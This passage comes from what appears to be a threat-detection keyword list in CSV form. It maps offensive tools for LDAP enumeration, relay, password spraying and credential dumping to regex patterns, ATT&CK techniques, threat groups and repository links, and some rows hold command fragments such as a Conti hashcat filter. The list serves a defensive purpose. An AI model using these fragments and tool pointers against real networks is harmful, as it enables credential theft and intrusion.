Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*ldapdomaindump*",".{0,1000}ldapdomaindump.{0,1000}","offensive_tool_keyword","ldapdomaindump","Active Directory information dumper via LDAP","T1087 - T1005 - T1016","TA0007","N/A","N/A","Discovery","https://github.com/dirkjanm/ldapdomaindump","1","1","N/A","10","10","1068","180","2024-02-13T12:41:07Z","2016-05-24T18:46:56Z" "*LDAPDomainDump*",".{0,1000}LDAPDomainDump.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "*ldapdomaindump.zip*",".{0,1000}ldapdomaindump\.zip.{0,1000}","offensive_tool_keyword","Pyramid","a tool to help operate in EDRs' blind spots","T1055 - T1106 - T1127 - T1129 - T1559","TA0002 - TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/naksyn/Pyramid","1","1","N/A","10","7","613","71","2024-04-03T22:51:28Z","2022-08-13T11:51:37Z" "*ldapfilter:*admincount=1* /format:hashcat*",".{0,1000}ldapfilter\:.{0,1000}admincount\=1.{0,1000}\s\/format\:hashcat.{0,1000}","offensive_tool_keyword","conti","Conti is a Ransomware-as-a-Service (RaaS) that was first observed in December 2019. Conti has been deployed via TrickBot and used against major corporations and government agencies particularly those in North America. As with other ransomware families - actors using Conti steal sensitive files and information from compromised networks and threaten to publish this data unless the ransom is paid","T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080","TA0002 - TA0003 - TA0004 - TA0007 - TA0009 - TA0040","Conti Ransomware","Wizard Spider","Ransomware","https://www.securonix.com/blog/on-conti-ransomware-tradecraft-detection/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*LdapMiner*",".{0,1000}LdapMiner.{0,1000}","offensive_tool_keyword","ldapminer","This is a tool I wrote to collect information from different LDAP Server implementation. This was written in C with the Netscape C","T1016 - T1018 - T1021 - T1046 - T1056 - T1069 - T1078 - T1087 - T1114 - T1482 - T1526 - T1597","TA0001 - TA0002 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Discovery","https://sourceforge.net/projects/ldapminer/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*ldapnomnom *",".{0,1000}ldapnomnom\s.{0,1000}","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0001 - TA0007","N/A","N/A","Exploitation Tools","https://github.com/lkarlslund/ldapnomnom","1","1","N/A","6","10","958","76","2024-02-19T18:12:13Z","2022-09-18T10:35:09Z" "*ldapnomnom --input*",".{0,1000}ldapnomnom\s\-\-input.{0,1000}","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0001 - TA0007","N/A","N/A","Exploitation Tools","https://github.com/lkarlslund/ldapnomnom","1","0","N/A","6","10","958","76","2024-02-19T18:12:13Z","2022-09-18T10:35:09Z" "*ldapnomnom-darwin-*",".{0,1000}ldapnomnom\-darwin\-.{0,1000}","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0001 - TA0007","N/A","N/A","Exploitation Tools","https://github.com/lkarlslund/ldapnomnom","1","1","N/A","6","10","958","76","2024-02-19T18:12:13Z","2022-09-18T10:35:09Z" "*ldapnomnom-linux-*",".{0,1000}ldapnomnom\-linux\-.{0,1000}","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0001 - TA0007","N/A","N/A","Exploitation Tools","https://github.com/lkarlslund/ldapnomnom","1","1","N/A","6","10","958","76","2024-02-19T18:12:13Z","2022-09-18T10:35:09Z" "*ldapnomnom-main*",".{0,1000}ldapnomnom\-main.{0,1000}","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0001 - TA0007","N/A","N/A","Exploitation Tools","https://github.com/lkarlslund/ldapnomnom","1","1","N/A","6","10","958","76","2024-02-19T18:12:13Z","2022-09-18T10:35:09Z" "*ldapnomnom-windows-386.exe*",".{0,1000}ldapnomnom\-windows\-386\.exe.{0,1000}","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0001 - TA0007","N/A","N/A","Exploitation Tools","https://github.com/lkarlslund/ldapnomnom","1","1","N/A","6","10","958","76","2024-02-19T18:12:13Z","2022-09-18T10:35:09Z" "*ldapnomnom-windows-amd64.exe*",".{0,1000}ldapnomnom\-windows\-amd64\.exe.{0,1000}","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0001 - TA0007","N/A","N/A","Exploitation Tools","https://github.com/lkarlslund/ldapnomnom","1","1","N/A","6","10","958","76","2024-02-19T18:12:13Z","2022-09-18T10:35:09Z" "*ldapnomnom-windows-arm64.exe*",".{0,1000}ldapnomnom\-windows\-arm64\.exe.{0,1000}","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0001 - TA0007","N/A","N/A","Exploitation Tools","https://github.com/lkarlslund/ldapnomnom","1","1","N/A","6","10","958","76","2024-02-19T18:12:13Z","2022-09-18T10:35:09Z" "*LDAP-Password-Hunter*",".{0,1000}LDAP\-Password\-Hunter.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/oldboy21/LDAP-Password-Hunter","1","1","N/A","10","2","191","27","2023-01-06T15:32:34Z","2021-07-26T14:27:01Z" "*ldaprelayclient.py*",".{0,1000}ldaprelayclient\.py.{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/connormcgarr/tgtdelegation","1","1","N/A","10","10","140","21","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z" "*ldaprelayclient.py*",".{0,1000}ldaprelayclient\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*LdapRelayScan.py*",".{0,1000}LdapRelayScan\.py.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","1","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*LdapRelayScan.py*",".{0,1000}LdapRelayScan\.py.{0,1000}","offensive_tool_keyword","LdapRelayScan","Check for LDAP protections regarding the relay of NTLM authentication","T1557","TA0001 - TA0006","N/A","N/A","Reconnaissance","https://github.com/zyn3rgy/LdapRelayScan","1","1","N/A","8","5","427","61","2024-03-13T20:04:51Z","2022-01-16T06:50:44Z" "*LdapRelayScan-main*",".{0,1000}LdapRelayScan\-main.{0,1000}","offensive_tool_keyword","LdapRelayScan","Check for LDAP protections regarding the relay of NTLM authentication","T1557","TA0001 - TA0006","N/A","N/A","Reconnaissance","https://github.com/zyn3rgy/LdapRelayScan","1","1","N/A","8","5","427","61","2024-03-13T20:04:51Z","2022-01-16T06:50:44Z" "*ldapsearchad.py*",".{0,1000}ldapsearchad\.py.{0,1000}","offensive_tool_keyword","ldapsearch-ad","Python3 script to quickly get various information from a domain controller through his LDAP service.","T1018 - T1087 - T1069","TA0007 - TA0002 - TA0008","N/A","N/A","Reconnaissance","https://github.com/yaap7/ldapsearch-ad","1","1","N/A","5","2","142","32","2024-03-25T13:05:26Z","2019-12-08T00:25:57Z" "*ldapsearch-ad.py*",".{0,1000}ldapsearch\-ad\.py.{0,1000}","offensive_tool_keyword","ldapsearch-ad","Python3 script to quickly get various information from a domain controller through his LDAP service.","T1018 - T1087 - T1069","TA0007 - TA0002 - TA0008","N/A","N/A","Reconnaissance","https://github.com/yaap7/ldapsearch-ad","1","1","N/A","5","2","142","32","2024-03-25T13:05:26Z","2019-12-08T00:25:57Z" "*ldap-searcher *",".{0,1000}ldap\-searcher\s.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "*ldapsentinel * raw *",".{0,1000}ldapsentinel\s.{0,1000}\sraw\s.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*ldapsentinel forest user*",".{0,1000}ldapsentinel\sforest\suser.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*LdapSignCheck.exe*",".{0,1000}LdapSignCheck\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File & C# project to check LDAP signing","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/cube0x0/LdapSignCheck","1","1","N/A","10","10","161","24","2022-10-25T13:36:43Z","2022-02-24T20:25:31Z" "*LdapSignCheck.Natives*",".{0,1000}LdapSignCheck\.Natives.{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File & C# project to check LDAP signing","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/cube0x0/LdapSignCheck","1","1","N/A","10","10","161","24","2022-10-25T13:36:43Z","2022-02-24T20:25:31Z" "*LdapSignCheck.sln*",".{0,1000}LdapSignCheck\.sln.{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File & C# project to check LDAP signing","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/cube0x0/LdapSignCheck","1","1","N/A","10","10","161","24","2022-10-25T13:36:43Z","2022-02-24T20:25:31Z" "*ldapsigncheck.x64.*",".{0,1000}ldapsigncheck\.x64\..{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File & C# project to check LDAP signing","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/cube0x0/LdapSignCheck","1","1","N/A","10","10","161","24","2022-10-25T13:36:43Z","2022-02-24T20:25:31Z" "*ldapsigncheck.x86.*",".{0,1000}ldapsigncheck\.x86\..{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File & C# project to check LDAP signing","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/cube0x0/LdapSignCheck","1","1","N/A","10","10","161","24","2022-10-25T13:36:43Z","2022-02-24T20:25:31Z" "*LDAPWordlistHarvester.ps1*",".{0,1000}LDAPWordlistHarvester\.ps1.{0,1000}","offensive_tool_keyword","LDAPWordlistHarvester","A tool to generate a wordlist from the information present in LDAP in order to crack passwords of domain accounts.","T1210.001 - T1087.003 - T1110","TA0001 - TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/p0dalirius/LDAPWordlistHarvester","1","1","N/A","5","3","288","22","2024-03-14T17:52:34Z","2023-09-22T10:10:10Z" "*LDAPWordlistHarvester.py*",".{0,1000}LDAPWordlistHarvester\.py.{0,1000}","offensive_tool_keyword","LDAPWordlistHarvester","A tool to generate a wordlist from the information present in LDAP in order to crack passwords of domain accounts.","T1210.001 - T1087.003 - T1110","TA0001 - TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/p0dalirius/LDAPWordlistHarvester","1","1","N/A","5","3","288","22","2024-03-14T17:52:34Z","2023-09-22T10:10:10Z" "*LDAPWordlistHarvester-main*",".{0,1000}LDAPWordlistHarvester\-main.{0,1000}","offensive_tool_keyword","LDAPWordlistHarvester","A tool to generate a wordlist from the information present in LDAP in order to crack passwords of domain accounts.","T1210.001 - T1087.003 - T1110","TA0001 - TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/p0dalirius/LDAPWordlistHarvester","1","1","N/A","5","3","288","22","2024-03-14T17:52:34Z","2023-09-22T10:10:10Z" "*ldd2bloodhound*",".{0,1000}ldd2bloodhound.{0,1000}","offensive_tool_keyword","ldapdomaindump","Active Directory information dumper via LDAP","T1087 - T1005 - T1016","TA0007","N/A","N/A","Discovery","https://github.com/dirkjanm/ldapdomaindump","1","1","N/A","10","10","1068","180","2024-02-13T12:41:07Z","2016-05-24T18:46:56Z" "*ldeep cache *",".{0,1000}ldeep\scache\s.{0,1000}","offensive_tool_keyword","ldeep","In-depth ldap enumeration utility","T1589 T1590 T1591","N/A","N/A","N/A","Reconnaissance","https://github.com/franc-pentest/ldeep","1","0","N/A","5","4","342","39","2024-03-28T10:30:53Z","2018-10-22T18:21:44Z" "*ldeep ldap -u *",".{0,1000}ldeep\sldap\s\-u\s.{0,1000}","offensive_tool_keyword","ldeep","In-depth ldap enumeration utility","T1589 T1590 T1591","N/A","N/A","N/A","Reconnaissance","https://github.com/franc-pentest/ldeep","1","0","N/A","5","4","342","39","2024-03-28T10:30:53Z","2018-10-22T18:21:44Z" "*ldeep*activedirectory.py*",".{0,1000}ldeep.{0,1000}activedirectory\.py.{0,1000}","offensive_tool_keyword","ldeep","In-depth ldap enumeration utility","T1589 T1590 T1591","N/A","N/A","N/A","Reconnaissance","https://github.com/franc-pentest/ldeep","1","1","N/A","5","4","342","39","2024-03-28T10:30:53Z","2018-10-22T18:21:44Z" "*ldeep*ldap_activedirectory.py*",".{0,1000}ldeep.{0,1000}ldap_activedirectory\.py.{0,1000}","offensive_tool_keyword","ldeep","In-depth ldap enumeration utility","T1589 T1590 T1591","N/A","N/A","N/A","Reconnaissance","https://github.com/franc-pentest/ldeep","1","1","N/A","5","4","342","39","2024-03-28T10:30:53Z","2018-10-22T18:21:44Z" "*ldeep_dump_users_enabled.json",".{0,1000}ldeep_dump_users_enabled\.json","offensive_tool_keyword","ldeep","In-depth ldap enumeration utility","T1589 T1590 T1591","N/A","N/A","N/A","Reconnaissance","https://github.com/franc-pentest/ldeep","1","1","N/A","5","4","342","39","2024-03-28T10:30:53Z","2018-10-22T18:21:44Z" "*ldeep_dump_users_enabled.lst",".{0,1000}ldeep_dump_users_enabled\.lst","offensive_tool_keyword","ldeep","In-depth ldap enumeration utility","T1589 T1590 T1591","N/A","N/A","N/A","Reconnaissance","https://github.com/franc-pentest/ldeep","1","1","N/A","5","4","342","39","2024-03-28T10:30:53Z","2018-10-22T18:21:44Z" "*ldeep_enum*",".{0,1000}ldeep_enum.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "*ldif2john.pl*",".{0,1000}ldif2john\.pl.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*LDPreloadPrivesc*",".{0,1000}LDPreloadPrivesc.{0,1000}","offensive_tool_keyword","DynastyPersist","Linux persistence tool with features like SSH Key Generation - Cronjob Persistence - Custom User with Root - RCE Persistence - LKM/Rootkit- Bashrc Persistence - Systemd Service for Root - LD_PRELOAD Privilege Escalation Config - Backdooring Message of the Day / Header and Modifying an Existing Systemd Service","T1055 - T1037 - T1078 - T1547 - T1546 - T1556","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Trevohack/DynastyPersist","1","0","N/A","9","2","132","14","2024-04-17T06:27:37Z","2023-08-13T15:05:42Z" "*LdrLockLiberator-main*",".{0,1000}LdrLockLiberator\-main.{0,1000}","offensive_tool_keyword","LdrLockLiberator","LdrLockLiberator is a collection of techniques for escaping or otherwise forgoing Loader Lock while executing your code from DllMain or anywhere else the lock may be present.","T1574.002 - T1055","TA0005","N/A","N/A","Defense Evasion","https://github.com/ElliotKillick/LdrLockLiberator","1","0","N/A","9","4","313","55","2024-04-28T21:16:21Z","2023-10-31T10:11:16Z" "*leaky/leakbuf.go*",".{0,1000}leaky\/leakbuf\.go.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*leapsecurity*",".{0,1000}leapsecurity.{0,1000}","offensive_tool_keyword","Github Username","github repo name hosting exploitation tools","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/leapsecurity","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*leechristensen/UnmanagedPowerShell*",".{0,1000}leechristensen\/UnmanagedPowerShell.{0,1000}","offensive_tool_keyword","UnmanagedPowerShell","Executes PowerShell from an unmanaged process","T1059 - T1086","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/leechristensen/UnmanagedPowerShell","1","1","N/A","6","5","461","108","2016-03-17T05:20:55Z","2014-12-15T00:59:03Z" "*leftp/BackupCreds*",".{0,1000}leftp\/BackupCreds.{0,1000}","offensive_tool_keyword","BackupCreds","A C# implementation of dumping credentials from Windows Credential Manager","T1003 - T1555","TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/leftp/BackupCreds","1","1","N/A","9","1","51","6","2023-09-23T10:37:05Z","2023-09-23T06:42:20Z" "*legalhackers.com/exploits/CVE*",".{0,1000}legalhackers\.com\/exploits\/CVE.{0,1000}","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","1","N/A","10","10","5246","1068","2024-02-17T11:44:50Z","2016-10-06T21:55:51Z" "*legba * --username*",".{0,1000}legba\s.{0,1000}\s\-\-username.{0,1000}","offensive_tool_keyword","legba","A multiprotocol credentials bruteforcer / password sprayer and enumerator","T1110 - T1110.003 - T1110.001","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/evilsocket/legba","1","0","N/A","10","10","1248","64","2024-03-12T12:39:48Z","2023-10-23T15:44:06Z" "*legba amqp *--target *",".{0,1000}legba\samqp\s.{0,1000}\-\-target\s.{0,1000}","offensive_tool_keyword","legba","A multiprotocol credentials bruteforcer / password sprayer and enumerator","T1110 - T1110.003 - T1110.001","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/evilsocket/legba","1","0","N/A","10","10","1248","64","2024-03-12T12:39:48Z","2023-10-23T15:44:06Z" "*legba dns *--data *",".{0,1000}legba\sdns\s.{0,1000}\-\-data\s.{0,1000}","offensive_tool_keyword","legba","A multiprotocol credentials bruteforcer / password sprayer and enumerator","T1110 - T1110.003 - T1110.001","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/evilsocket/legba","1","0","N/A","10","10","1248","64","2024-03-12T12:39:48Z","2023-10-23T15:44:06Z" "*legba ftp *--target *",".{0,1000}legba\sftp\s.{0,1000}\-\-target\s.{0,1000}","offensive_tool_keyword","legba","A multiprotocol credentials bruteforcer / password sprayer and enumerator","T1110 - T1110.003 - T1110.001","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/evilsocket/legba","1","0","N/A","10","10","1248","64","2024-03-12T12:39:48Z","2023-10-23T15:44:06Z" "*legba http *--http-payload *",".{0,1000}legba\shttp\s.{0,1000}\-\-http\-payload\s.{0,1000}","offensive_tool_keyword","legba","A multiprotocol credentials 